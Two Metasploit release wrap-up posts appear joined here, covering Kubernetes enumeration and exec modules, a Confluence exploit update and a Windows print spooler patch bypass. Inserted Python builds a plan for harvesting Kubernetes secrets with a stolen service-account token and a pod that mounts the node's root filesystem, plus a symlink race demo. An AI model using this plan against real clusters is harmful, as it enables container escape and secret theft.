This week we’ve got two Kubernetes modules coming at you from adfoster-r7 and smcintyre-r7. First up is an enum module auxiliary/cloud/kubernetes/enum_kubernetes that’ll extract a variety of information including the namespaces, pods, secrets, service token information, and the Kubernetes environment version! Next is an authenticated code execution module exploit/multi/kubernetes/exec (which shipped with a new websocket implementation, too, by the way) that will spin up a new pod with a Meterpreter payload for you provided you have the Kubernetes JWT token and access to the Kubernetes REST API. These modules can even be run through a compromised container that may be running on the Kubernetes cluster.

Atlassian Confluence WebWork OGNL Injection gets Windows support

You might remember Confluence Server CVE-2021-26084 making an appearance in a wrap-up last month, and it’s back! Rapid7’s own wvu-r7 has updated his Confluence Server exploit to support Windows targets.

New module content (2)

  • Kubernetes Enumeration by Spencer McIntyre and Alan Foster – This adds a module for enumerating Kubernetes environments. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. It will extract a variety of information including the namespaces, pods, secrets and version.
  • Kubernetes authenticated code execution by Spencer McIntyre and Alan Foster – Adds a new exploit/multi/kubernetes/exec module. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. The module creates a new pod which will execute a Meterpreter payload to open a new session, as well as mounting the host’s file system when possible.
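The two module entries above and the introduction both describe the same workflow: read the service-account token available inside a compromised pod, enumerate the namespace through the REST API, then create a pod that runs a payload and, where policy allows, mounts the node’s filesystem. The following Python is an added example of those pieces; it is not the enum_kubernetes or exec module code, the sample token is constructed and unsigned, and the in-pod paths and image name are assumptions.

```python
"""Added example: the pieces an in-cluster enumeration/exec workflow needs. Not
the Metasploit modules' code; paths, names and the sample token are assumptions."""
import base64
import json
import ssl
import urllib.request

# Standard in-pod mount of the service-account credential (assumed present).
SA_DIR = "/var/run/secrets/kubernetes.io/serviceaccount"
SA_TOKEN_FILE = f"{SA_DIR}/token"
SA_CA_FILE = f"{SA_DIR}/ca.crt"


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def sa_token_claims(token: str) -> dict:
    """Read the claims of a service-account JWT without verifying it (we are the
    bearer, not the API server); they say which namespace we are scoped to."""
    _header, payload, _sig = token.split(".")
    return json.loads(b64url_decode(payload))


def namespace_from_claims(claims: dict) -> str:
    """'sub' is system:serviceaccount:<namespace>:<name> in both the legacy
    secret-based and the projected token formats, so read it from there."""
    _system, _kind, namespace, _name = claims["sub"].split(":", 3)
    return namespace


def enumeration_paths(namespace: str) -> list:
    """REST paths for the enumeration step, least sensitive first. Each needs
    list/get on that resource in RBAC; a 403 on one does not stop the others."""
    return [
        "/version",
        "/api/v1/namespaces",
        f"/api/v1/namespaces/{namespace}/serviceaccounts",
        f"/api/v1/namespaces/{namespace}/pods",
        f"/api/v1/namespaces/{namespace}/secrets",
    ]


def exec_pod_manifest(namespace: str, image: str, command: list, mount_host: bool) -> dict:
    """Pod spec the exec step POSTs to /api/v1/namespaces/{ns}/pods. With
    mount_host the node's root filesystem appears at /host inside the pod
    (needs create on pods and no admission policy forbidding hostPath)."""
    container = {"name": "session", "image": image, "command": command}
    spec = {"containers": [container], "restartPolicy": "Never"}
    if mount_host:
        spec["volumes"] = [{"name": "host", "hostPath": {"path": "/"}}]
        container["volumeMounts"] = [{"name": "host", "mountPath": "/host"}]
    return {"apiVersion": "v1", "kind": "Pod",
            "metadata": {"name": "example-session", "namespace": namespace},
            "spec": spec}


def api_get(api_server: str, path: str, token: str, ca_file: str = SA_CA_FILE) -> dict:
    """Bearer-token GET against the API server, validating its certificate with
    the in-pod CA bundle. Not exercised offline."""
    ctx = ssl.create_default_context(cafile=ca_file)
    req = urllib.request.Request(api_server + path,
                                 headers={"Authorization": f"Bearer {token}"})
    with urllib.request.urlopen(req, context=ctx, timeout=10) as resp:
        return json.load(resp)


def make_sample_token(claims: dict) -> str:
    """Constructed, unsigned stand-in for a real SA token so this runs offline."""
    def enc(obj):
        return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()
    return f"{enc({'alg': 'RS256', 'typ': 'JWT'})}.{enc(claims)}.{enc({'sig': 'n/a'})}"


SAMPLE_CLAIMS = {  # shape of a legacy SA token's claims; the values are made up
    "iss": "kubernetes/serviceaccount",
    "kubernetes.io/serviceaccount/namespace": "default",
    "kubernetes.io/serviceaccount/service-account.name": "default",
    "sub": "system:serviceaccount:default:default",
}


def plan_from_token(token: str) -> dict:
    """What to enumerate and what pod to create, derived from the token alone."""
    ns = namespace_from_claims(sa_token_claims(token))
    return {"namespace": ns,
            "paths": enumeration_paths(ns),
            "pod": exec_pod_manifest(ns, "busybox:latest", ["sh", "-c", "sleep 3600"], True)}


if __name__ == "__main__":
    print(json.dumps(plan_from_token(make_sample_token(SAMPLE_CLAIMS)), indent=2))
```

With a default service-account token most of these paths return 403; the two calls worth checking first are the secrets listing and pod creation, which you can confirm from a workstation with `kubectl auth can-i list secrets --token=<token>` and `kubectl auth can-i create pods --token=<token>` before spending a noisy API call on them.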

Enhancements and features

  • #15732 from dwelch-r7 – Adds terminal size synchronisation for fully interactive shells against Linux environments with shell -it. This functionality is behind a feature flag and can be enabled with features set fully_interactive_shells true.
  • #15769 from wvu-r7 – Added Windows support to the Atlassian Confluence CVE-2021-26084 exploit.
  • #15773 from adfoster-r7 – Adds a collection of useful commands for configuring a local or remote Kubernetes environment to aid with testing and exploring Metasploit’s Kubernetes modules and pivoting capabilities. The resource files include deploying two vulnerable applications, and populating secrets which can be extracted and stored as loot, as well as utility commands for creating admin and service account tokens.

Bugs fixed

  • #15760 from adfoster-r7 – Fixes an issue when attempting to store JSON loot, where the extension was always being set to bin instead of json.

Metasploit Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2021/01/22/metasploit-wrap-up-95/

Windows print spooler vulnerability…again

Here we have bwatters-r7 coming in with an exploit for CVE-2020-1337, a patch bypass for a Windows print spooler elevation of privilege vulnerability that was exploited in the wild last year. The original vulnerability, CVE-2020-1048, garnered quite a bit of interest from the security community, in large part because the Windows print spooler is a legacy component that was abused as part of the Stuxnet attack. Alex Ionescu and Yarden Shafir, the researchers who discovered CVE-2020-1048, have published a great write-up if you’re looking for a deep dive.

The first patch that Microsoft released for CVE-2020-1048 uses a check to verify that the process creating a printer port targeting a location has privileges to write to that location. Unfortunately, that patch only checks the permissions when the port is created. The bypass utilized here simply creates the port pointing to a location the user can write to. Then, after the printer port is created, it creates a symlink from the location pointed to by the printer port to a second location. The check will pass because the link is only created after the check, but the link will be in place when the print takes place, so the file write will pass through and end up in the trusted location.
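The gap described above is a time-of-check/time-of-use bug: the permission check happens at port creation, the privileged write happens later at print time. The following Python is an added model of that gap, not the exploit module’s code. It uses a temp directory and a POSIX symlink in place of the Windows printer port and junction, and the spooler side runs as the same user here, whereas the real spooler writes as SYSTEM.

```python
"""Added example: why validating a printer port's target only at creation time is
not enough. Modelled on POSIX with a temp directory and a symlink; the real bug
involves Windows printer ports and a junction, but the check/use gap is the same."""
import os
import tempfile


def create_port(port_dir: str) -> dict:
    """Spooler side, port creation: the patched check. Verifies the caller can
    write to the target and remembers where that path resolved at check time."""
    if not os.access(port_dir, os.W_OK):
        raise PermissionError(f"caller may not write to {port_dir}")
    return {"path": port_dir, "validated_real": os.path.realpath(port_dir)}


def swap_in_symlink(port_dir: str, target_dir: str) -> None:
    """Attacker side, after the check has passed: the validated directory is
    replaced by a link to a location the caller could not have had validated."""
    os.rmdir(port_dir)
    os.symlink(target_dir, port_dir)


def print_to_port(port: dict, name: str, data: bytes, recheck: bool) -> str:
    """Spooler side, print time. With recheck=False the creation-time check is
    trusted, so the write follows the link. With recheck=True the target is
    re-resolved at use time and refused if it no longer matches."""
    if recheck and os.path.realpath(port["path"]) != port["validated_real"]:
        raise PermissionError("port target changed since it was validated")
    out = os.path.join(port["path"], name)
    with open(out, "wb") as f:
        f.write(data)
    return os.path.realpath(out)


def demo(recheck: bool) -> tuple:
    """Run the sequence once. Returns (landed_in_trusted_dir, detail)."""
    base = tempfile.mkdtemp()
    trusted = os.path.join(base, "trusted")  # stands in for a privileged location
    user_dir = os.path.join(base, "user")    # a location the caller may write to
    os.mkdir(trusted)
    os.mkdir(user_dir)
    port = create_port(user_dir)             # check passes: user_dir is writable
    swap_in_symlink(user_dir, trusted)       # race window: the target changes
    try:
        written = print_to_port(port, "evil.dll", b"payload", recheck)
    except PermissionError as exc:
        return False, str(exc)
    return written.startswith(os.path.realpath(trusted) + os.sep), written


if __name__ == "__main__":
    print("creation-time check only:", demo(recheck=False))
    print("re-check at print time:  ", demo(recheck=True))
```

The fix modelled by `recheck=True` is the general one for this bug class: a check on a path is only meaningful at the moment the path is used, so either re-validate at use time or, better, hold an open handle to the validated directory and write relative to it so that a later swap of the path cannot redirect the write.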

A very prompt fix

Chiggins gave us a fix for the msfconsole prompt with PR #14635. For those not in the know, you can set your prompt in the console with the set Prompt command. Thanks to Chiggins, setting your prompt to the timestamp works again! So feel free to give it a go with set Prompt %T.

New Modules (1)

Enhancements and features

  • #14583 from dwelch-r7 – This PR adds the ability for framework to detect when a given nmap scan requires sudo privileges and re-runs nmap with sudo, prompting the user in the usual way.
  • #14621 from geyslan – This PR reduces the size of the linux/x64/shell_bind_tcp_random_port payload and maintains the functionality.
  • #14630 from h00die – Adds the hardcoded creds found in Zyxel devices to the unix creds files, as captured within CVE-2020-29583.

Bugs Fixed

  • #14597 from arno01 – Updates the modules/auxiliary/gather/external_ip.rb module to provide a valid default vhost setting.
  • #14609 from dwelch-r7 – A bug was fixed in the lib/msf/core/exploit/remote/http_client.rb and lib/msf/core/opt_http_rhost_url.rb libraries whereby if a user used a /etc/hosts entry for resolving a hostname to an IP address, the VHOST datastore variable would be set incorrectly. This has now been resolved by improving the logic of these two libraries and updating the spec checks accordingly.
  • #14632 from zomfg-zombie – This fixes a compatibility issue with the OpenSMTPD MAIL FROM RCE exploit where it was failing to function when the target host’s shell uses a strictly POSIX compatible read utility, as is the case in Ubuntu.
  • #14635 from Chiggins – A bug was fixed in the lib/rex/ui/text/shell.rb library whereby users who used the %T character within their command prompts would not get the full timestamp information. A fix has been applied to address this regression so that users can now get the full timestamp information within their prompts.
